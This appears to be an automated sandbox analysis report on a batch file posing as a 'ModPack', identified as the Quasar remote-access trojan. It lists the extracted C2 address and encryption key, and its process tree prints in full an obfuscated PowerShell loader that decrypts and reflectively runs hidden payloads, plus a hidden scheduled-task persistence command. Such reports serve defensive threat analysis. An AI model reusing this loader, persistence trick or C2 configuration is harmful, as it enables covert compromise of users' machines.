Analysis

  • max time kernel
    37s
  • max time network
    58s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
  • submitted
    13-04-2024 20:25

General

  • Target

    ModPack.bat

  • Size

    1.6MB

  • MD5

    3ab2a7793b323765353fa8e597cec156

  • SHA1

    c892cc5095ac6f37d0e94bbc09e11abe3d62027a

  • SHA256

    a2c3928e33f47ec7dd1caf488af3aecd0e829031740dda298513ef24795bad54

  • SHA512

    90c1a411b9b9cbcef33cc80c0f746ee67501e21998c8a85c7af868da450a8f7ab2a405562b3e9c9e26f77a4a75b9532d30816f20865dfdd29c555882ea72abcc

  • SSDEEP

    24576:zVHGMbIfHrrVuAAJ1wVKTV9QzlkWMGyR7mgVvIhiMej1Ma:pHEvrroBVykjea

Malware Config

Extracted

Family

quasar

Version

1.4.1

Botnet

Office04

C2

notes-creation.gl.at.ply.gg:27030

Mutex

6735a92b-88d2-4fbe-8e59-605a85072109

Attributes
  • encryption_key

    8681483EF512C654BECF205A0D74FFCA4B129A98

  • install_name

    Client.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Trapix Client Startup

  • subdirectory

    SubDir

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar payload 1 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ModPack.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4544
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WHU9LIZZZnpXvmHPYv+jvQzDV7636Q84bvp2wMYdDEY='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WBD6QKFaFapBAwUbctfeFg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $XGRxz=New-Object System.IO.MemoryStream(,$param_var); $eoWcZ=New-Object System.IO.MemoryStream; $ZKHsZ=New-Object System.IO.Compression.GZipStream($XGRxz, [IO.Compression.CompressionMode]::Decompress); $ZKHsZ.CopyTo($eoWcZ); $ZKHsZ.Dispose(); $XGRxz.Dispose(); $eoWcZ.Dispose(); $eoWcZ.ToArray();}function execute_function($param_var,$param2_var){ $aqZjX=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $tUwTg=$aqZjX.EntryPoint; $tUwTg.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\ModPack.bat';$qeekY=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\ModPack.bat').Split([Environment]::NewLine);foreach ($hvTHj in $qeekY) { if ($hvTHj.StartsWith(':: ')) { $YbvrY=$hvTHj.Substring(3); break; }}$payloads_var=[string[]]$YbvrY.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
      2⤵
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4620
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_492_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_492.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:5044
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_492.vbs"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1540
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_492.bat" "
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3400
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WHU9LIZZZnpXvmHPYv+jvQzDV7636Q84bvp2wMYdDEY='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WBD6QKFaFapBAwUbctfeFg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $XGRxz=New-Object System.IO.MemoryStream(,$param_var); $eoWcZ=New-Object System.IO.MemoryStream; $ZKHsZ=New-Object System.IO.Compression.GZipStream($XGRxz, [IO.Compression.CompressionMode]::Decompress); $ZKHsZ.CopyTo($eoWcZ); $ZKHsZ.Dispose(); $XGRxz.Dispose(); $eoWcZ.Dispose(); $eoWcZ.ToArray();}function execute_function($param_var,$param2_var){ $aqZjX=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $tUwTg=$aqZjX.EntryPoint; $tUwTg.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_492.bat';$qeekY=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_492.bat').Split([Environment]::NewLine);foreach ($hvTHj in $qeekY) { if ($hvTHj.StartsWith(':: ')) { $YbvrY=$hvTHj.Substring(3); break; }}$payloads_var=[string[]]$YbvrY.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
            5⤵
            • Blocklisted process makes network request
            • Suspicious behavior: EnumeratesProcesses
            PID:192

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

    Filesize

    3KB

    MD5

    8592ba100a78835a6b94d5949e13dfc1

    SHA1

    63e901200ab9a57c7dd4c078d7f75dcd3b357020

    SHA256

    fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c

    SHA512

    87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    97da514a7a27270fc599c6cb620fd88f

    SHA1

    be5e7b94013c510ceebe76b51d043cb4c4b8f594

    SHA256

    6acabf00f2d1f8d853264cb8091217b7ca64fd57e6ae401c6bde8b6e1710feee

    SHA512

    8ba265d7bd25d35932712062f7be52e6c40cac8f736e88f8c0b3cfa5fa0f148ea333f9e684103452ba6187135072041b1a3570ae61de3a430e6da11e2eb9fe82

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_k4glmppw.lrj.ps1

    Filesize

    1B

    MD5

    c4ca4238a0b923820dcc509a6f75849b

    SHA1

    356a192b7913b04c54574d18c28d46e6395428ab

    SHA256

    6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

    SHA512

    4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

  • C:\Users\Admin\AppData\Roaming\startup_str_492.bat

    Filesize

    1.6MB

    MD5

    3ab2a7793b323765353fa8e597cec156

    SHA1

    c892cc5095ac6f37d0e94bbc09e11abe3d62027a

    SHA256

    a2c3928e33f47ec7dd1caf488af3aecd0e829031740dda298513ef24795bad54

    SHA512

    90c1a411b9b9cbcef33cc80c0f746ee67501e21998c8a85c7af868da450a8f7ab2a405562b3e9c9e26f77a4a75b9532d30816f20865dfdd29c555882ea72abcc

  • C:\Users\Admin\AppData\Roaming\startup_str_492.vbs

    Filesize

    115B

    MD5

    c243d5c52a814e474e3210f4e5cbfca9

    SHA1

    b110207ad8f59d7f36113b37625c607e9f44f0d3

    SHA256

    d7b9f8147c5859c398ad9f1d61a3d9947510bc15959d5b751dd737e58a45d1c1

    SHA512

    50e5ad845060d9d829cf7df5530462ebe9dc205f171ea03f714421bbc2950b1a50ff8fd2bc6623daebc9a06125776c2c999ee7c0be077d2111347a0d067527f6

  • memory/192-113-0x000001FCFCB10000-0x000001FCFCE34000-memory.dmp

    Filesize

    3.1MB

  • memory/192-117-0x000001FCFD980000-0x000001FCFDB42000-memory.dmp

    Filesize

    1.8MB

  • memory/192-132-0x000001FCFC350000-0x000001FCFC360000-memory.dmp

    Filesize

    64KB

  • memory/192-131-0x000001FCFC350000-0x000001FCFC360000-memory.dmp

    Filesize

    64KB

  • memory/192-130-0x000001FCFC350000-0x000001FCFC360000-memory.dmp

    Filesize

    64KB

  • memory/192-129-0x00007FFC21F70000-0x00007FFC2295C000-memory.dmp

    Filesize

    9.9MB

  • memory/192-122-0x000001FCFD670000-0x000001FCFD6AE000-memory.dmp

    Filesize

    248KB

  • memory/192-121-0x000001FCFD590000-0x000001FCFD5A2000-memory.dmp

    Filesize

    72KB

  • memory/192-116-0x000001FCFD6F0000-0x000001FCFD7A2000-memory.dmp

    Filesize

    712KB

  • memory/192-115-0x000001FCFD5E0000-0x000001FCFD630000-memory.dmp

    Filesize

    320KB

  • memory/192-108-0x000001FCFC350000-0x000001FCFC360000-memory.dmp

    Filesize

    64KB

  • memory/192-94-0x000001FCFC350000-0x000001FCFC360000-memory.dmp

    Filesize

    64KB

  • memory/192-93-0x000001FCFC350000-0x000001FCFC360000-memory.dmp

    Filesize

    64KB

  • memory/192-91-0x00007FFC21F70000-0x00007FFC2295C000-memory.dmp

    Filesize

    9.9MB

  • memory/4620-27-0x000001EC6CD10000-0x000001EC6CE42000-memory.dmp

    Filesize

    1.2MB

  • memory/4620-5-0x00007FFC21F70000-0x00007FFC2295C000-memory.dmp

    Filesize

    9.9MB

  • memory/4620-6-0x000001EC6C8A0000-0x000001EC6C8B0000-memory.dmp

    Filesize

    64KB

  • memory/4620-8-0x000001EC6C8A0000-0x000001EC6C8B0000-memory.dmp

    Filesize

    64KB

  • memory/4620-10-0x000001EC6C9B0000-0x000001EC6CA26000-memory.dmp

    Filesize

    472KB

  • memory/4620-4-0x000001EC6C7F0000-0x000001EC6C812000-memory.dmp

    Filesize

    136KB

  • memory/4620-87-0x00007FFC21F70000-0x00007FFC2295C000-memory.dmp

    Filesize

    9.9MB

  • memory/4620-26-0x000001EC6CA30000-0x000001EC6CA38000-memory.dmp

    Filesize

    32KB

  • memory/4620-21-0x000001EC6C8A0000-0x000001EC6C8B0000-memory.dmp

    Filesize

    64KB

  • memory/5044-73-0x00007FFC21F70000-0x00007FFC2295C000-memory.dmp

    Filesize

    9.9MB

  • memory/5044-39-0x0000016803DF0000-0x0000016803E00000-memory.dmp

    Filesize

    64KB

  • memory/5044-37-0x0000016803DF0000-0x0000016803E00000-memory.dmp

    Filesize

    64KB

  • memory/5044-36-0x00007FFC21F70000-0x00007FFC2295C000-memory.dmp

    Filesize

    9.9MB

  • memory/5044-54-0x0000016803DF0000-0x0000016803E00000-memory.dmp

    Filesize

    64KB

  • memory/5044-69-0x0000016803DF0000-0x0000016803E00000-memory.dmp

    Filesize

    64KB